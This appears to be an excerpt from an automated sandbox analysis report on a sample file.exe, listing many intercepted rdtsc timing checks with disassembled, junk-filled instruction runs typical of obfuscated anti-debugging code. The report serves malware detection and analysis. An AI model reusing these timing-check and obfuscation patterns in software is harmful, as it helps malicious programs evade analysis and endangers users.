              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11E2 second address: 2E1203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0CB0C50343h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3DD3 second address: 2E3DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0CB0E1B256h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3DDD second address: 2E3E75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0CB0C50343h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0CB0C50338h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2519h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F0CB0C50338h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D22ADh], ebx 0x00000055 mov dword ptr [ebp+122D36F0h], esi 0x0000005b push 00000000h 0x0000005d mov edi, ecx 0x0000005f xchg eax, esi 0x00000060 jmp 00007F0CB0C50343h 0x00000065 push eax 0x00000066 pushad 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4F33 second address: 2E4F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3021 second address: 2E3025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4F37 second address: 2E4F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA5FE second address: 2EA61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jo 00007F0CB0C50336h 0x0000000e jng 00007F0CB0C50336h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F0CB0C50336h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4F3B second address: 2E4F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0CB0E1B263h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA61B second address: 2EA696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0CB0C50338h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sub ebx, 012FA08Ah 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F0CB0C50338h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 jng 00007F0CB0C50339h 0x0000004a adc bl, FFFFFF98h 0x0000004d mov dword ptr [ebp+12475971h], edi 0x00000053 push 00000000h 0x00000055 mov di, F132h 0x00000059 pushad 0x0000005a mov cl, F2h 0x0000005c mov edx, dword ptr [ebp+122D3A2Fh] 0x00000062 popad 0x00000063 xchg eax, esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E60ED second address: 2E60F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F0CB0E1B256h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA696 second address: 2EA6AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E706E second address: 2E7072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E503A second address: 2E5040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7072 second address: 2E7078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E5040 second address: 2E5068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50340h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F0CB0C5033Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E5068 second address: 2E506D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E506D second address: 2E5089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C50348h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB620 second address: 2EB624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB624 second address: 2EB6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jmp 00007F0CB0C50340h 0x00000012 popad 0x00000013 nop 0x00000014 or ebx, dword ptr [ebp+122D24A7h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F0CB0C50338h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 call 00007F0CB0C50345h 0x0000003b sub dword ptr [ebp+12475892h], ebx 0x00000041 pop edi 0x00000042 call 00007F0CB0C50340h 0x00000047 mov ebx, 58A97A70h 0x0000004c pop ebx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+12469E41h], edi 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 pushad 0x00000058 pushad 0x00000059 popad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB6AA second address: 2EB6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E96F1 second address: 2E96F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB6B3 second address: 2EB6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB6B7 second address: 2EB6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA888 second address: 2EA88C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA88C second address: 2EA892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA892 second address: 2EA897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B337 second address: 28B33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B33D second address: 28B341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B341 second address: 28B345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B345 second address: 28B34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5B5F second address: 2F5B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5B65 second address: 2F5B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5B6B second address: 2F5B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0CB0C50342h 0x0000000d jnc 00007F0CB0C50336h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5B8B second address: 2F5B95 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0CB0E1B256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5E36 second address: 2F5E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5E3A second address: 2F5E4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F0CB0E1B256h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F5E4A second address: 2F5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FBCD8 second address: 2FBCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28CDC0 second address: 28CDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28CDC7 second address: 28CDCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301864 second address: 30186A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30186A second address: 301894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0CB0E1B25Dh 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jp 00007F0CB0E1B258h 0x00000018 jne 00007F0CB0E1B262h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301894 second address: 30189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30189A second address: 3018A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301F07 second address: 301F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0CB0C50348h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301F2D second address: 301F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301F33 second address: 301F39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 302478 second address: 302483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 302623 second address: 302659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0CB0C50336h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F0CB0C50343h 0x00000010 jno 00007F0CB0C50336h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0CB0C5033Fh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 302803 second address: 30280C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305767 second address: 30578A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0CB0C50346h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30578A second address: 3057A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B25Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3057A0 second address: 3057A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F27C second address: 30F282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F282 second address: 30F286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F286 second address: 30F296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F0CB0E1B256h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30DF2E second address: 30DF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0CB0C50345h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30E088 second address: 30E0A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0CB0E1B25Eh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30E225 second address: 30E229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30E4BE second address: 30E4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30E791 second address: 30E7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0CB0C50336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30E7A0 second address: 30E7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313847 second address: 31385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0CB0C50336h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F0CB0C50336h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31385A second address: 313874 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F0CB0E1B256h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3139BD second address: 3139C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0CB0C50336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313B35 second address: 313B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313B3C second address: 313B54 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0CB0C50338h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F0CB0C5033Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313B54 second address: 313B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313B5E second address: 313B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313B6F second address: 313B74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313E29 second address: 313E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313E34 second address: 313E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F0CB0E1B258h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jmp 00007F0CB0E1B262h 0x00000024 pop edi 0x00000025 jmp 00007F0CB0E1B25Fh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313E7B second address: 313E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 313E81 second address: 313E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31430E second address: 314312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314312 second address: 31432F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B264h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31432F second address: 314335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314887 second address: 31488D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31488D second address: 31490A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0CB0C50341h 0x0000000b jp 00007F0CB0C50355h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F0CB0C50347h 0x00000018 jmp 00007F0CB0C50346h 0x0000001d jmp 00007F0CB0C5033Ah 0x00000022 jne 00007F0CB0C5033Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14A4 second address: 2D14B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14B3 second address: 2D14B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14B8 second address: 2D14D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B264h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14D0 second address: 2D14D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14D4 second address: 2D14F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0CB0E1B264h 0x00000012 jmp 00007F0CB0E1B25Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14F4 second address: 2D14FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0CB0C50336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D14FE second address: 2D1502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1502 second address: 2D1513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1513 second address: 2D1517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1517 second address: 2D157B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0CB0C50338h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edx, 65508909h 0x00000027 mov edi, ecx 0x00000029 jmp 00007F0CB0C50348h 0x0000002e push 4ACD4FB7h 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F0CB0C50342h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D157B second address: 2D1581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
